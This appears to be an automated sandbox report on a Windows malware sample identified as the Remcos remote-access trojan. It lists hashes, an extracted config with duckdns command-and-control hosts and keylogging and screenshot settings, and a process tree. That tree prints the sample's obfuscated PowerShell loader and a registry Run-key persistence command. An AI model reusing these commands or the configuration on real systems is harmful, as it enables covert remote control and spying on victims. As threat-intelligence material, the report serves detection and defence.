Analysis
-
max time kernel
51s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25-08-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe
Resource
win7-20240729-en
General
-
Target
895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe
-
Size
568KB
-
MD5
91dd6ee8e62b032c8264b3b55e69eddb
-
SHA1
f2688c3f49fec062e9ad7a2dec3571cd668aa879
-
SHA256
895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e
-
SHA512
194bb6a4314d9815851373b9559cc52b9d2712988d44e06db8ece1c9d45b98e41c15d51984e6ed4182adb17eedd278dd47cda9e42c01a3efc941fdfd0c3400e7
-
SSDEEP
12288:5T54bavS+gjBubIHBR5h2rZgS+0cWz198PCg7XwoCaz:5T54OK+A/Bl2rZEW59hg7X7Lz
Malware Config
Extracted
remcos
Ready
freak4u.duckdns.org:22891
freak4u.duckdns.org:22892
hgbourst28lasor2.duckdns.org:22891
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
lmzoiuts.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
alsmoritstf-T1OUDN
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Soulx = "%Grundbegrebet% -windowstyle minimized $Sultens=(Get-ItemProperty -Path 'HKCU:\\Uncourtlike\\').Pepsin;%Grundbegrebet% ($Sultens)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 drive.google.com 5 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2676 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2840 Powershell.exe 2676 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2840 set thread context of 2676 2840 Powershell.exe 33 -
pid Process 2840 Powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2684 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2840 Powershell.exe 2840 Powershell.exe 2840 Powershell.exe 2840 Powershell.exe 2840 Powershell.exe 2840 Powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2840 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2840 Powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2296 wrote to memory of 2840 2296 895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe 30 PID 2296 wrote to memory of 2840 2296 895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe 30 PID 2296 wrote to memory of 2840 2296 895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe 30 PID 2296 wrote to memory of 2840 2296 895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe 30 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2840 wrote to memory of 2676 2840 Powershell.exe 33 PID 2676 wrote to memory of 2700 2676 wab.exe 34 PID 2676 wrote to memory of 2700 2676 wab.exe 34 PID 2676 wrote to memory of 2700 2676 wab.exe 34 PID 2676 wrote to memory of 2700 2676 wab.exe 34 PID 2700 wrote to memory of 2684 2700 cmd.exe 36 PID 2700 wrote to memory of 2684 2700 cmd.exe 36 PID 2700 wrote to memory of 2684 2700 cmd.exe 36 PID 2700 wrote to memory of 2684 2700 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe"C:\Users\Admin\AppData\Local\Temp\895417f8fd168a02d71365994d4e4500cdbf31af01be6ce8998fc38a342cac2e.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -windowstyle minimized "$Granulocyte = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Forstbotanikkerne.mul' ; $Bratsch=$Granulocyte.SubString(74923,3);.$Bratsch($Granulocyte) "2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soulx" /t REG_EXPAND_SZ /d "%Grundbegrebet% -windowstyle minimized $Sultens=(Get-ItemProperty -Path 'HKCU:\Uncourtlike\').Pepsin;%Grundbegrebet% ($Sultens)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soulx" /t REG_EXPAND_SZ /d "%Grundbegrebet% -windowstyle minimized $Sultens=(Get-ItemProperty -Path 'HKCU:\Uncourtlike\').Pepsin;%Grundbegrebet% ($Sultens)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2684
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
73KB
MD578eec866c6ffb79951d549e336dda7b9
SHA13b5a94808ff418990e482da13631af8efde0c29a
SHA256eb97322a17dd92ff745c9333d9c04b5ccbfada8eeef148bc12620d29b8050112
SHA51286308cd86bd9459f371fc30b62daaa0e29c2b98a1f18a7dfbe36752d6c33b8c92b433e90fd194ad1b35bfa7b6dff7e39df7819e05237d19dc573024974daca23
-
Filesize
473KB
MD597a069e9227d6f5b5f7fbf44b09b27b4
SHA17c280441cd871bfbe870630e58a8332a38052c4f
SHA256a96b25412afd0081ca2697e0e62bb6074a132f9078a93b770ffeb6492559d68e
SHA512941cbae11f5d28beff3e281305521c070babd2b688e4d37298008232887b7152e063097783f4604392f3cb9981f16646e94865ef3ad9dd2303e2e1b9d52a0603